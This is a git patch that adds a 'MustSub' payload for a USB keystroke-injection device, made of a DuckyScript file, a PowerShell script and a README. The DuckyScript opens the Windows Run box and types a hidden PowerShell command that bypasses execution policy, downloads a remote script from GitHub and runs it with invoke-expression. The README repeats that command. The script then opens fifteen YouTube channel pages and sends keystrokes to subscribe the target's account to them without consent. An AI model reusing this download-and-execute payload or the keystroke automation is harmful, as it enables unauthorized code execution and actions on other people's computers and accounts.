From ceacd5bc663a12f00aee0cf729e4350d503baf52 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Thu, 15 Dec 2022 23:37:28 -0600 Subject: [PATCH] Add files via upload --- Payloads/Flip-MustSub/MustSub-Execute.txt | 16 +++ Payloads/Flip-MustSub/MustSub.ps1 | 41 ++++++++ Payloads/Flip-MustSub/Readme.md | 115 ++++++++++++++++++++++ 3 files changed, 172 insertions(+) create mode 100644 Payloads/Flip-MustSub/MustSub-Execute.txt create mode 100644 Payloads/Flip-MustSub/MustSub.ps1 create mode 100644 Payloads/Flip-MustSub/Readme.md diff --git a/Payloads/Flip-MustSub/MustSub-Execute.txt b/Payloads/Flip-MustSub/MustSub-Execute.txt new file mode 100644 index 0000000..76b2a09 --- /dev/null +++ b/Payloads/Flip-MustSub/MustSub-Execute.txt @@ -0,0 +1,16 @@ +REM Title: MustSub + +REM Author: I am Jakoby + +REM Description: This payload is used to get your target to subscribe to 15 of my favorite hacker youtube channels + +REM Target: Windows 10, 11 + +REM -------------------------------------------------------------------------------------- +REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW. +REM -------------------------------------------------------------------------------------- + +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-MustSub/MustSub.ps1?dl=1; invoke-expression $pl +ENTER diff --git a/Payloads/Flip-MustSub/MustSub.ps1 b/Payloads/Flip-MustSub/MustSub.ps1 new file mode 100644 index 0000000..f7be9c8 --- /dev/null +++ b/Payloads/Flip-MustSub/MustSub.ps1 @@ -0,0 +1,41 @@ +$channels = @" +https://www.youtube.com/iamjakoby +https://www.youtube.com/c/CosmodiumCS +https://www.youtube.com/c/zSecurity +https://www.youtube.com/c/SystemExploited/featured +https://www.youtube.com/c/Lab401 +https://www.youtube.com/c/TheCyberMentor +https://www.youtube.com/c/JohnHammond010 +https://www.youtube.com/c/MalwareTechBlog +https://www.youtube.com/c/SecurityFWD +https://www.youtube.com/c/Nahamsec +https://www.youtube.com/c/jhaddix +https://www.youtube.com/c/NetworkChuck +https://www.youtube.com/c/DavidBombal +https://www.youtube.com/c/JimBrowning +https://www.youtube.com/user/TechInterpreterInc +"@ + +$URLs = $channels -split "`n" + +function subscribe { + +[CmdletBinding()] +param ( +[Parameter (Mandatory = $True, Position=0, ValueFromPipeline = $True)] +[string]$channel +) + +Add-Type -AssemblyName System.Windows.Forms +$o=New-Object -ComObject WScript.Shell +$url = -join($channel,"?sub_confirmation=1") +Start-Process $url +Start-Sleep -Seconds 3 +[System.Windows.Forms.SendKeys]::SendWait('{TAB}'*2) +[System.Windows.Forms.SendKeys]::SendWait('{ENTER}') +Start-Sleep -Seconds 1 +[System.Windows.Forms.SendKeys]::SendWait('%{F4}') +Start-Sleep -Seconds 1 +} + +foreach ($channel in $URLs) {subscribe $channel} diff --git a/Payloads/Flip-MustSub/Readme.md b/Payloads/Flip-MustSub/Readme.md new file mode 100644 index 0000000..be6c7fe --- /dev/null +++ b/Payloads/Flip-MustSub/Readme.md @@ -0,0 +1,115 @@ +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) + + + +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# Must Sub + +A script used to get your target to subscribe to 15 of my favorite hacker youtube channels + +## Description + +This script will loop through an array of urls + +each URL will be passed through the subscribe function + +## Getting Started + +### Dependencies + +* An internet connection +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload +``` +powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-MustSub/MustSub.ps1?dl=1; invoke-expression $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

📱 My Socials 📱

+
+ + + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Golang + +
Instagram +
+ + Jsonnet + +
Discord +
+
+ +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [MG](https://github.com/OMG-MG) + +

(back to top)

+ +

+ Github Stats +